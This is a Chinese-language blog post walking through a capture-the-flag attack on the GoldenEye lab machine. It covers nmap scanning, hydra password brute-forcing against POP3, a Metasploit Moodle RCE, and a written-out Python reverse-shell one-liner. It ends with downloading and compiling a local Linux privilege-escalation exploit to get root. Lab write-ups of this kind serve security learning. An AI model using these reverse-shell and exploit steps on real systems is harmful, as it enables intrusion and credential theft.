freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

GoldenEye?卫星? 在网络安全的视角带你重新观影!
探险者安全 2024-03-22 16:15:23 79443

Before hack  

靶机环境准备:https://cloud.189.cn/t/EZfQVfa2YNnm 访问码:om4x

点击文件自动vmware启动

Hack it

nmap端口扫描  

首先要先发现这台机器的IP地址

查看本机ifconfig信息,查看ip地址,本机与靶机处于统一网段。

1711094801_65fd3c11b279b2201aa0b.png!small?1711094802496

nmap扫一下本网段存活的IP地址。

1711094809_65fd3c195100ddbcf9da2.png!small?1711094814689

扫出来的有域名,说明就是这个靶机。

继续信息搜集,进行端口扫描。

1711094817_65fd3c212514225be56a3.png!small?1711094817890

80端口开放的是http服务。

直接访问

1711094824_65fd3c289c8f264f69f11.png!small?1711094825307

按照他给的目录登陆,发现需要登陆

1711094833_65fd3c313316640d118a6.png!small?1711094834362

需要爆破密码,回去右键查看源码,看到terminal.js,有一下信息。

1711094840_65fd3c382ad7b4f8c32e5.png!small?1711094840805

将InvincibleHack3rhtml解码得到InvincibleHack3r

密码爆破  

并且这段文字中还有两个人名,Boris,Natalya,试试登陆。用户名首字母大写就不行,要试试小写。

最终,boris,InvincibleHack3r为最终解。

1711094849_65fd3c41e889a687913cc.png!small?1711094851344

其中有一句:1711094860_65fd3c4c0fecef7caaa78.png!small?1711094860738

但是在端口扫描的时候并没有看到pop3服务。

那么我们进行一下nmap -p-全端口扫描。

1711094867_65fd3c539dfe7702ea34a.png!small?1711094870961

扫出两个未知端口

然后再用nmap探测底层的详细的信息

nmap -p55006,55007 ip -sS -sV -A -T5

1711094876_65fd3c5c337704ea39b57.png!small?1711094877215

hydra  

上面还提示着用着密码登陆,我们可以使用hydra进行登陆破解

hydra -L 1.txt -P /usr/share/wordlists/fasttrack.txt 192.168.137.32 -s 55007 pop3

-l是文本

-L 指定文本里面的用户,- P指的是字典文件 ,-s指的是端口,最后是服务。

echo -e 'boris\nnatalya' >1.txt 使用命令,将这两个人名放进去。

启功九头蛇!

1711094885_65fd3c655fb704bfb77ba.png!small?1711094886094

爆破出natalya的密码是bird


NC登陆  

nc 192.168.137.32 55007 ------登陆邮箱

user boris ------登陆用户

pass secret1! ------登陆密码

list ------查看邮件信息

retr 1~3 ------查看邮件信息

1711094897_65fd3c711817fb18fe455.png!small?1711094898292

登陆进natalya的邮箱,有两封邮件

查看第一个

1711094906_65fd3c7a53a36ffdf0ce8.png!small?1711094907139

似乎没啥用

查看第二个

1711094913_65fd3c816f77a4911f9c6.png!small?1711094914606

浅浅翻译了一下,

好的,Natalyn,我有一个新学生给你。由于这是一个新系统,如果你看到任何配置问题,请让我或boris知道,特别是它与安全有关。。。即使不是,也只是打着“安全”的幌子进入。。。它将使变更单升级,而不需要太多麻烦:)好的,

用户信誉是:用户名:xenia                
密码:RCP90rulez!

Boris验证了她是一个有效的承包商,所以只需创建帐户即可,好吗?

如果你在内部域名之外没有URL:severnaya-station.com/gnocertdir

**确保编辑您的主机文件,因为您通常在网络外远程工作。。。。

由于您是Linux用户,只需将此服务器IP指向/etc/hosts中的severnaya-station.com即可。

那么就修改一下host文件吧

1711094924_65fd3c8c011d986f04a55.png!small?1711094924820

直接访问那个url,长这个样子

CMS  

1711094933_65fd3c95863be351e5f0d.png!small?1711094934348

直接用上面的密码尝试登陆

成功进入


1711094940_65fd3c9c62d32b87d4577.png!small?1711094941043

结合开头看到的moodle,可以知道这是一个开源的CMS,2.2.3为版本

1711094948_65fd3ca4900a5d4404c50.png!small?1711094949710

结合whatweb指纹识别,有了更多的信息。

1711094954_65fd3caa79f95249f9cc5.png!small?1711094955219

获得了另外一个人名doak,继续爆破它的密码

1711094962_65fd3cb27483c75d2250b.png!small?1711094963346

得到doak的密码是goat

继续nc查看它的邮箱,只有一条,查看一下

1711094968_65fd3cb8e33ff851ee3b5.png!small?1711094969751

给了用户名和密码

图片隐写(binwalk,exiftool)  

回到网页,用此登陆!

成功登陆

然而,并没有发现什么信息。在home的右面能看见一个文件,打开看看

1711094981_65fd3cc560b10f4bd0dd8.png!small?1711094982227


访问这个图片

1711094988_65fd3cccec8d11bf84bdd.png!small?1711094991446

显然是隐写,检查一下图片内容,用wget下载图片到当前文件夹

1711094996_65fd3cd48c6f89ce695f0.png!small?1711094997563

先尝试用binwalk分离一下

分离出两个文件

1711095003_65fd3cdbb18ea0794ce8b.png!small?1711095004516

用exiftool(图虫)查看图片详细信息

1711095010_65fd3ce282bc9f9afbfa2.png!small?1711095011433

其中的description,base64解码后是xWinter1995x!

strings会将其变成ASCII码

回到之前,可以知道它是admin的密码,登陆网页尝试,成功登陆admin的账户

1711095021_65fd3ceddeff3847c5a73.png!small?1711095022515

MSF get shell  

Moole 2.2.3 exp cve ---> CVE-2013-3630 漏洞可利用 29324 https://nvd.nist.gov/vuln/detail/CVE-2013-3630

此版本有很多漏洞利用,由于我们需要在目标计算机上进行外壳访问,因此我选择远程代码执行漏洞(RCE)漏洞进行利用.

MSF启动

msfconsole进入MSF

search moodle 查找moodle类型的攻击模块

1711095031_65fd3cf772e0ff53e0c2d.png!small?1711095032139

1711095042_65fd3d02a7b3b8f8694d9.png!small?1711095043410

use 直接+上面的编号就行,show options显示条件

1711095049_65fd3d09adbc1b1f93c5a.png!small?1711095052509

成功!注意要更改cms里面的powershell设置。如下:


1711095056_65fd3d109f27b1bb30876.png!small?1711095057395

1711095066_65fd3d1a17a57c77b25de.png!small?1711095066808

安装了python

提权  

python -c 'import pty; pty.spawn("/bin/bash")' ---将shell进行tty

获得交互shell,1711095075_65fd3d2350872816763c4.png!small

提权的话一定要到tmp目录下才能进行提权。

回到网页,发现另外一个地方有执行命令的地方。这是第二个拿shell的方法。

1711095091_65fd3d33733d3dc4ee9af.png!small?1711095092094

利用python的反弹shell  

python反弹shell`                
`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.111",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'                 注意地址和端口需要改

先在本机开启监听

1711095120_65fd3d50bc2cf300f83af.png!small?1711095122170

填上你的上面的python代码,并且记得保存!


监听得到回显。同样建立tty

1711095154_65fd3d7235a80b034b702.png!small?1711095157825

输入命令uname -a:显示系统名、节点名称、操作系统的发行版号、内核版本等等。

1711095168_65fd3d80db9527a4e80ed.png!small?1711095171941

找到exp,id37292

1711095191_65fd3d97a72bb8c444b8e.png!small?1711095192281

这是具体的步骤,要求有gcc(可以用cc代替)

1711095199_65fd3d9f1bc7a671ea221.png!small?1711095199857


有gcc,那么可以直接用。

search 37292  

kali搜索下:               
searchsploit 37292 ---搜索kali本地的exp库中37292攻击脚本信息                
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/ ---目录自行修改

1711095213_65fd3dad65ecaedae73bb.png!small?1711095213994

可以直接看到,复制到桌面后,更改其中的gcc命令为cc

1711095220_65fd3db43cfe3dfc6a981.png!small?1711095221611

在本文件夹创建了一个简短的http服务。

1711095226_65fd3dbae19695c4a4a75.png!small?1711095229579

可以知道有wget,那么直接把文件下载到目标主机上

1711095233_65fd3dc19c3a1a9da7229.png!small?1711095234532

GET FLAG

成功下载后执行cc编译:               
cc -o exp 37292.c ---C语言的CC代码编译点c文件                
chmod +x exp ---编译成可执行文件,并赋权                
./exp ---点杠执行

id ---查看目前权限

看到root就是执行成功。

ls /root,为空。可能是隐藏文件。用ls -al查看隐藏文件

1711095241_65fd3dc91225e92a125cc.png!small?1711095241937

最终用cat命令得到flag!

阅读须知:

探险者安全团队技术文章仅供参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用本公众号所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者            
本人负责,公众号及作者不为此承担任何责任,如有侵权烦请告知,我们会立即删除并致歉,创作不易转载请标明出处.感谢!

# 漏洞 # web安全 # 内网渗透 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 探险者安全 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
探险者安全 LV.3
本团队致力于安全分享,分享ctf比赛wp,工具开发、渗透测试、漏洞挖掘等。
  • 6 文章数
  • 1 关注者
GitHub高危漏洞:黑客可伪装微软身份分发恶意软件
2024-04-26
HackTheBox?Codify!
2024-04-21
交换式网络捕获网络流量的方法
2024-03-22
文章目录